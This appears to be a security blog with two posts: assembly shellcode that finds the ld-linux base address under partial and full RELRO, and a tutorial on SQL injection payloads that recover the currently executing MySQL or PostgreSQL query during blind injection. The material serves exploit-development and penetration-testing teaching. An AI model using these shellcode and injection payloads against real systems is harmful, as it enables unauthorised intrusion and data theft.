March 20, 2015

Resolving the Base Pointer of the Linux Program Interpreter with Shellcode

Oftentimes an exploit developer desires the ability to call functions from shared libraries with their shellcode and a guarantee of proper function resolution. The way that the Linux Executable and Linkable Format (ELF) Application Binary Interface (ABI) works, a program interpreter (nearly always ld-linux) is specified in the binary's .INTERP section. When a program is executed, the program interpreter loads all of the associated shared libraries and then populates the program's import table, called the Global Offset Table (GOT), with pointers to the appropriate functions.

Because of Address Space Layout Randomization (ASLR), the pointers to these shared libraries and functions differ on each execution of the program. This can make calling functions not referenced in an application's GOT from shellcode more difficult. By isolating the address space of the program interpreter, it is possible to parse its binary format and re-use its code to load shared objects and call functions not referenced by an application's import table. The code examples here cover locating the memory space of ld-linux; however, they do not cover the code integration aspect. That will be covered either here at a later date, in our planned shellcode workshop, or both.

The GOT can be populated in one of two ways, depending on the mode of relocation read-only (RELRO) selected at link time:

  1. Partial RELRO contexts populate the GOT as the functions are needed.
  2. Full RELRO contexts populate the entire GOT before jumping to the application's entry point.

Helpful VMAs

Before diving into resolution of the program interpreter, the reader should note the following Virtual Memory Addresses (VMAs), which are fixed for their ABI/architecture when the binary is not position-independent and is linked at the default base address.

ELF32

  • 0x8048000 is the base pointer of the currently executing binary, 100% of the time.
  • 0x80480bc contains a 4-byte VMA that is a pointer to the currently executing binary's DYNAMIC section.

ELF64

  • 0x400000 is the base pointer of the currently executing binary, 100% of the time.
  • 0x400130 contains a VMA that is a pointer to the currently executing binary's DYNAMIC section. The field is 8 bytes wide, but the address fits in its low 4 bytes.
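
The header addresses above can be derived from the ELF header layout. The sketch below is an illustration in Python, not part of the shellcode. It assumes that the program headers immediately follow the ELF header and that the DYNAMIC program header is the fifth one (index 4); both assumptions are implied by the constants above rather than guaranteed. The function name is hypothetical.

```python
# Header sizes and field offsets taken from the ELF specification.
LAYOUT = {
    "ELF32": {"ehdr_size": 0x34, "phdr_size": 0x20, "p_vaddr_off": 0x08},
    "ELF64": {"ehdr_size": 0x40, "phdr_size": 0x38, "p_vaddr_off": 0x10},
}

def dynamic_pointer_address(base, elf_class, phdr_index=4):
    """Address of the p_vaddr field of program header `phdr_index`.

    phdr_index=4 is an assumption: it matches binaries whose program
    headers are ordered PHDR, INTERP, LOAD, LOAD, DYNAMIC.
    """
    lay = LAYOUT[elf_class]
    return (base + lay["ehdr_size"]
            + phdr_index * lay["phdr_size"]
            + lay["p_vaddr_off"])

print(hex(dynamic_pointer_address(0x8048000, "ELF32")))  # 0x80480bc
print(hex(dynamic_pointer_address(0x400000, "ELF64")))   # 0x400130
```

If a binary carries a different number of program headers before DYNAMIC, the index changes and so does the address.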

Partial RELRO

Partial RELRO is the default on most variants of GCC on Linux, and it does not clean up all of the references to ld-linux at runtime. In fact, in partial RELRO contexts, the program interpreter leaves behind a small gem: a pointer to _dl_runtime_resolve. This pointer is left at the third entry (index 2) of the .got.plt section, which the Procedure Linkage Table (PLT) stubs use so that functions can be resolved as they are called. Simply walking backwards in memory from _dl_runtime_resolve until ELF magic (0x7f 0x45 0x4c 0x46) is reached isolates the base pointer of ld-linux in partial RELRO contexts.
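
The backwards walk can be modelled outside of shellcode. The following Python sketch operates on a made-up memory snapshot rather than a live process; `memory`, `region_start`, and the fake resolver address are hypothetical stand-ins. It steps in 0x100-byte increments after clearing the low byte of the pointer.

```python
ELF_MAGIC = b"\x7fELF"

def find_elf_base(memory, region_start, pointer, step=0x100):
    """Walk backwards from `pointer` to the nearest ELF magic.

    `memory` is a bytes-like snapshot whose first byte lives at
    address `region_start` (both are illustrative assumptions).
    """
    addr = pointer & ~(step - 1)      # clear the low byte of the address
    while addr >= region_start:
        off = addr - region_start
        if memory[off:off + 4] == ELF_MAGIC:
            return addr
        addr -= step
    return None                       # ran off the start of the snapshot

# Fake 64 KiB mapping with an ELF header at its start.
REGION = 0x7f0000000000
image = bytearray(0x10000)
image[0:4] = ELF_MAGIC
resolver = REGION + 0x5a30            # pretend address of the resolver

print(hex(find_elf_base(image, REGION, resolver)))  # 0x7f0000000000
```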

The example code below locates .GOT.PLT[2] by traversing through the dynamic section. Starting at the dynamic section, the next occurrence of a pointer to the dynamic section is always .GOT.PLT[0]. This code places the ld-linux base pointer into the %rcx register.

# ABI="ELF64"
.section .text
.global main
main:             
  # read the dynamic header
  push $0x400130ff
  pop %rbx
  shr $0x08, %ebx          #  %rbx  = 0x400130
                           # (%rbx) = location of dynamic section

skip_to_dynamic:  
  # this is a vma, so 32 bit reg is fine.
  mov (%rbx), %esi         # put dynamic section location into %rsi

fix_dflag:        
  cld                      # make the dflag go forwards...

find_got_plt:     
  # Search past the dynamic section until it finds
  # another pointer to the dynamic section.  This
  # will be the beginning of .got.plt
  lodsl                    # lodsl for magically short searching
  cmpl %eax, (%rbx)        # save a couple bytes because its a vma.
  jne find_got_plt

found_resolver:   
  mov 0xc(%rsi), %rcx      # %rcx = qword pointer to resolver
                           # usually _dl_runtime_resolve (.got.plt[2])

find_base:        
  xor %cl, %cl             # it'll be an address ending in 00
                           # if this doesn't happen, it may also find false bases
                           
  cmpl $0x464c457f, (%rcx) # check for ELF magic
  loopne find_base         # loopne automatically does a dec %rcx

ld_base_found:
  # loopne decrements %rcx once more after the match, so add
  # one to make %rcx a direct pointer to the ld-linux base.
  inc %rcx
compile/assemble: gcc partial-relro.s -o partial_relro

There is still a problem with this example, though. This code can't isolate the base pointer in a full RELRO environment. In a full RELRO environment, the PLT is cleaned up a bit and pointers to the resolver are removed before jumping to the entry point. After a lot of observations at runtime using gdb, and inspecting executable files on-disk using the readelf utility, a solution was devised.

Full RELRO

After looking at many binaries, it was discovered that every dynamic section contains a pointer to .got.plt (the DT_PLTGOT entry). In every single binary observed, the pointer just before it belongs to the DT_DEBUG entry, which is blank on disk and is filled in at runtime with the address of a structure that gdb recognizes as r_debug. The fifth field in r_debug, r_ldbase (offset 0x10 in 32 bit and offset 0x20 in 64 bit), is a pointer directly to the ld-linux base. So the process is as follows:

  1. Traverse to the dynamic section.
  2. Find .got.plt by looping forwards in memory until a pointer to _DYNAMIC is found.
  3. Search the dynamic section for a pointer to .got.plt.
  4. Grab the pointer just before the pointer to .got.plt; this is a pointer to DEBUG.
  5. Put the fifth field in DEBUG into a register; this is the base pointer to ld-linux.
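
The steps above can be rehearsed against a synthetic memory image. The Python sketch below builds a fake 32-bit snapshot, with every address and value in it made up for illustration, and then walks it in the same order. For step 3 it searches the dynamic section from its start, as the proof-of-concept assembly does.

```python
import struct

BASE = 0x8048000            # ELF32 image base from the text
DYN_SLOT = 0x80480bc        # holds the address of the dynamic section
DT_NEEDED, DT_DEBUG, DT_PLTGOT, DT_NULL = 1, 21, 3, 0

def build_fake_image():
    """Hypothetical little-endian snapshot; the layout is invented."""
    mem = bytearray(0x2000)
    dyn, got, dbg = BASE + 0x1000, BASE + 0x1100, BASE + 0x1200

    def put(addr, *words):
        struct.pack_into("<%dI" % len(words), mem, addr - BASE, *words)

    put(DYN_SLOT, dyn)
    put(dyn, DT_NEEDED, 1, DT_DEBUG, dbg, DT_PLTGOT, got, DT_NULL, 0)
    put(got, dyn, 0, 0)                  # .got.plt[0] points at _DYNAMIC
    put(dbg, 1, 0, 0, 0, 0xf7fd9000)     # r_debug; fifth field is the base
    return mem

def read32(mem, addr):
    return struct.unpack_from("<I", mem, addr - BASE)[0]

def find_ld_base(mem):
    dyn = read32(mem, DYN_SLOT)          # step 1: go to the dynamic section
    p = dyn
    while read32(mem, p) != dyn:         # step 2: first pointer to _DYNAMIC
        p += 4
    got = p
    p = dyn
    while read32(mem, p) != got:         # step 3: pointer to .got.plt
        p += 4
    debug = read32(mem, p - 8)           # step 4: value of the entry before
    return read32(mem, debug + 0x10)     # step 5: fifth field of r_debug

print(hex(find_ld_base(build_fake_image())))  # 0xf7fd9000
```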

The ELF32 proof-of-concept code below illustrates this process, placing the base pointer into the ebx register. Note that it is compiled with gcc's "-s" option, which strips symbol and debug information from the on-disk binary. The DEBUG entry this code uses is populated at runtime, which is why the code works regardless.

# ABI="ELF32"
.section .text
.global main
main:
  mov 0x80480bc, %ebx   # move pointer to _DYNAMIC_ into ebx
  push %ebx
  pop %esi              # copy ptr to esi


find_got:               # loop until the GOT is found
  lodsl
  cmp %ebx, %eax
  jne find_got


find_debug:             # rescan the dynamic section from its
  xchg %ebx, %esi       # start for a pointer to the GOT
  sub $0x4, %ebx        # lodsl overshot by 4; %ebx = GOT address

find_debug_loop:
  lodsl
  cmp %ebx, %eax
  jne find_debug_loop


found_debug:
  mov -0xc(%esi), %eax  # Grab the value of the dynamic entry
                        # just before the GOT pointer (r_debug)

get_interp_base:        # move the fifth pointer in DEBUG
  mov 0x10(%eax), %ebx  # into ebx - ptr to ld-linux base
compile/assemble: gcc -fstack-protector-all -s -fPIE -Wl,-z,relro,-z,now relro-ld-basefinder.s -o relro-ld-basefinder

This technique works on ELF64 as well as ELF32. It also appears to work regardless of whether the above compile options are present, and thus is a reliable method for determining the address of ld-linux's ELF magic. This code has been used to start a new abicode project on our GitHub.
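
The two r_debug offsets quoted earlier (0x10 for 32 bit, 0x20 for 64 bit) follow from the structure's field order under natural alignment. The Python sketch below recomputes them; the field list mirrors struct r_debug as declared in glibc's link.h, and the helper name is hypothetical. It assumes each field is aligned to its own size.

```python
def field_offsets(fields, sizes):
    """Offsets under natural alignment (each field aligned to its size)."""
    offsets, cursor = {}, 0
    for name, kind in fields:
        size = sizes[kind]
        cursor = (cursor + size - 1) // size * size   # round up to alignment
        offsets[name] = cursor
        cursor += size
    return offsets

# Field order of struct r_debug; r_state is an enum, sized like an int.
R_DEBUG = [("r_version", "int"), ("r_map", "ptr"), ("r_brk", "ptr"),
           ("r_state", "int"), ("r_ldbase", "ptr")]

ilp32 = field_offsets(R_DEBUG, {"int": 4, "ptr": 4})
lp64 = field_offsets(R_DEBUG, {"int": 4, "ptr": 8})
print(hex(ilp32["r_ldbase"]), hex(lp64["r_ldbase"]))   # 0x10 0x20
```

On 64 bit the padding after the two int-sized fields is what moves the fifth field from 0x10 to 0x20.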

Update - ELF64 version of the above code for full RELRO added to abicode. These "full RELRO" versions work in partial RELRO and non-RELRO environments too.


March 19, 2015

Enumerating the Currently Executing Query Context with SQL Injection

There are many times when performing a penetration test that an auditor can run into a blind SQL injection vulnerability. In some cases, the vulnerability is not actually blind and can be accessed using a union select or joint select statement; however, in-band exploitation is impossible without knowing the SQL query generated by the vulnerable application. This post will guide the reader through usable queries for enumeration that can be leveraged to discover the SQL statement currently being exploited. It assumes that the reader already understands how to enumerate data through an SQL injection vulnerability.

The Currently Executing Query

The queries here were tested on MySQL Server version 5.1 and PostgreSQL Server version 9.1; to test these without an environment, use SQL Fiddle. In MySQL, the following query returns itself:

mysql> select info from information_schema.processlist where id=connection_id();
+--------------------------------------------------------------------------+
| info                                                                     |
+--------------------------------------------------------------------------+
| select info from information_schema.processlist where id=connection_id() |
+--------------------------------------------------------------------------+
1 row in set (0.12 sec)

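Similarly, in PostgreSQL, the query below will suffice. The pid and query columns carry these names from version 9.2 onward; in 9.1 and earlier they are named procpid and current_query: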

select query from pg_stat_activity where pid=pg_backend_pid();

When injecting into a query, these payloads can be used to discover the context of the query being injected; but there is a crucial problem yet to solve, addressed below.

Challenges Introduced by Enumeration

When enumerating data, a URL may look similar to:
http://domain.tld/file.ext?id=1 and [query][comparison]

Enumerating data can take 8 requests to retrieve a single byte, and works by asking the server to perform a series of comparisons (yes or no questions) until a value can be isolated. Because the comparisons change as the value is narrowed down, the text of the executing query also changes with every request. An automated tool that tries to enumerate the queries above through an injection would therefore probably fail, because the data it is reading is altered by each request it makes.
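
The figure of 8 requests per byte comes from halving the range 0 to 255 on every question. A minimal Python sketch of that search follows; `ask` is a hypothetical callback standing in for one HTTP request that returns the server's yes or no answer.

```python
def enumerate_byte(ask):
    """Recover a value in 0..255 using yes/no range questions.

    `ask(lo, hi)` stands in for one request; it returns True when
    the hidden byte lies between lo and hi inclusive.
    """
    lo, hi, requests = 0, 255, 0
    while lo < hi:
        mid = (lo + hi) // 2
        requests += 1
        if ask(lo, mid):
            hi = mid          # the byte is in the lower half
        else:
            lo = mid + 1      # the byte is in the upper half
    return lo, requests

secret = ord("s")             # local stand-in for the remote data
value, used = enumerate_byte(lambda lo, hi: lo <= secret <= hi)
print(chr(value), used)       # s 8
```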

To compensate for this, a "needle" can be inserted into a MySQL query by assigning a value to a variable. This needle can then be used as a marker to determine when to stop enumerating the data, or even to select only parts of the executing query that do not change. Suppose table `entry' is accessed by the vulnerable page, running the following query:

mysql> select * from entry where id=1;
+----+-------------+
| id | name        |
+----+-------------+
|  1 | First entry |
+----+-------------+
1 row in set (0.02 sec)

The important part of the query in this situation that a remote attacker can't see is "select * from entry where id=". A valid injection to set the variable "myvar" may look like:

http://domain.tld/file.ext?id=1 and @myvar:=10

Which would turn the query into:

select * from entry where id=1 and @myvar:=10;

The purpose of defining a variable is not to use it later, but to inject it as a marker. It can be used as a needle when passed as an argument to MySQL's substring_index() function. A union select example illustrates this below:

mysql> select * from entry where id=1 and @myvar:=10
    -> union select 1,substring_index(
    ->   (select info from information_schema.processlist where id=connection_id()),
    ->   '@myvar',
    ->   1);
+----+-------------------------------------+
| id | name                                |
+----+-------------------------------------+
|  1 | First entry                         |
|  1 | select * from entry where id=1 and  |
+----+-------------------------------------+
2 rows in set (0.00 sec)

Notice that the second line containing the output of the union select is the currently executing SQL query only UP TO the point of the injected needle. This example won't work during a blind SQL injection, though. A URL to enumerate the information with blind SQL injection may look something like:

http://domain.tld/file.ext?id=1 and @myvar:=10 and ascii(substring(substring_index(
(select info from information_schema.processlist where id=connection_id()),'@myvar'
,1),1,1)) between 0 and 255
(Newlines added for legibility)

The above query should always be true on MySQL databases, because the ascii code of the first character of the query being executed should always be between 0 and 255. It would generate the following query and output as a "true" statement:

mysql> select * from entry where id=1 and @myvar:=10
    -> and ascii(substring(substring_index(
    -> (select info from information_schema.processlist where id=connection_id()),
    -> '@myvar',
    -> 1),1,1)) between 0 and 255;
+----+-------------+
| id | name        |
+----+-------------+
|  1 | First entry |
+----+-------------+
1 row in set (0.05 sec)
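
The needle's effect can be simulated without a database. In the Python sketch below, `fake_server` is a hypothetical stand-in for the vulnerable page: it rebuilds the full query for every request, cuts it at the needle, and answers one range comparison. The payload text changes on each request, yet the recovered prefix does not. Returning 0 past the end of the string is modelled on MySQL's ascii('') returning 0.

```python
def substring_index(text, delim, count=1):
    """Python stand-in for MySQL substring_index() with a positive count."""
    return delim.join(text.split(delim)[:count])

def payload(pos, lo, hi):
    """Injected suffix for one comparison; it differs on every request."""
    return (" and @myvar:=10 and ascii(substring(substring_index("
            "(select info from information_schema.processlist "
            "where id=connection_id()),'@myvar',1),%d,1)) "
            "between %d and %d" % (pos, lo, hi))

def fake_server(pos, lo, hi):
    """Simulated oracle: evaluates the comparison against its own query."""
    query = "select * from entry where id=1" + payload(pos, lo, hi)
    stable = substring_index(query, "@myvar", 1)
    code = ord(stable[pos - 1]) if pos <= len(stable) else 0
    return lo <= code <= hi

def recover_prefix():
    out, pos = [], 1
    while True:
        lo, hi = 0, 255
        while lo < hi:                    # 8 comparisons per character
            mid = (lo + hi) // 2
            if fake_server(pos, lo, mid):
                hi = mid
            else:
                lo = mid + 1
        if lo == 0:                       # past the end of the prefix
            break
        out.append(chr(lo))
        pos += 1
    return "".join(out)

print(repr(recover_prefix()))   # 'select * from entry where id=1 and '
```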

Unfortunately, the info column of MySQL's information_schema.processlist table will not contain comments in the query, and thus they cannot be used as needles during injection.

PostgreSQL, on the other hand, does not have a substring_index() function. It provides the same feature using a function called split_part(). PostgreSQL also won't let developers use WHERE clauses for in-line variable definitions. On the bright side, PostgreSQL does retrieve comments from its "pg_stat_activity" view. An example enumeration URL for a PostgreSQL injection:

http://domain.tld/file.ext?id=1/*marker*/ and ascii(substring(split_part((select 
query from pg_stat_activity where pid=pg_backend_pid()),'/*marker*/',1),1,1)) 
between 0 and 255
(Newlines added for legibility)

This may turn the query into something like:

select * from entry where id=1/*marker*/ and ascii(substring(split_part((select 
query from pg_stat_activity where pid=pg_backend_pid()),'/*marker*/',1),1,1)) 
between 0 and 255
(Newlines added for legibility)
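
To see what split_part() isolates here, the function can be approximated in a few lines of Python. This is only a stand-in for illustration, not PostgreSQL's implementation; it treats the field number as 1-based and returns an empty string when the field does not exist.

```python
def split_part(text, delim, n):
    """Python stand-in for PostgreSQL split_part(); n is 1-based."""
    parts = text.split(delim)
    return parts[n - 1] if 1 <= n <= len(parts) else ""

query = ("select * from entry where id=1/*marker*/ and ascii(substring("
         "split_part((select query from pg_stat_activity where "
         "pid=pg_backend_pid()),'/*marker*/',1),1,1)) between 0 and 255")

print(split_part(query, "/*marker*/", 1))   # select * from entry where id=1
```

Everything after the first marker, including the changing comparison, is discarded.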

There are some rare edge cases in which multiple queries will be executing within the PID context. This can happen because of INSERT DELAYED statements or a variety of other concurrency tricks (like triggers). In order to be sure the query only returns the correct row, consider appending a LIKE condition and a limit clause (be sure to URL-encode the "%" SQL wildcard character as %25):

http://domain.tld/file.ext?id=1/*marker*/ and ascii(substring(split_part((select 
query from pg_stat_activity where pid=pg_backend_pid() and query like '%marker%'
limit 1),'/*marker*/',1),1,1)) between 0 and 255
(Newlines added for legibility)

A similar clause will work on MySQL:

http://domain.tld/file.ext?id=1 and @myvar:=10 and ascii(substring(substring_index(
(select info from information_schema.processlist where id=connection_id() and info
like '%@myvar%' limit 1),'@myvar',1),1,1)) between 0 and 255
(Newlines added for legibility)
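
The URLs above are shown unencoded for legibility. As a small illustration of the encoding step, Python's urllib.parse.quote turns the "%" wildcard into %25 along with the other reserved characters; the clause used here is just the LIKE fragment from the PostgreSQL example.

```python
from urllib.parse import quote

clause = " and query like '%marker%' limit 1"
encoded = quote(clause, safe="")   # encode everything that is not unreserved
print(encoded)
# %20and%20query%20like%20%27%25marker%25%27%20limit%201
```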

Being able to determine a query context like this can be a valuable skill; it may be possible to extract data with methods better than blind enumeration once the query has been revealed. More on this topic will be addressed in our upcoming SQL injection workshop.

In closing, as this is the first post here, it has to be said: please use these techniques responsibly. Respect your internet neighbors and always do the right thing.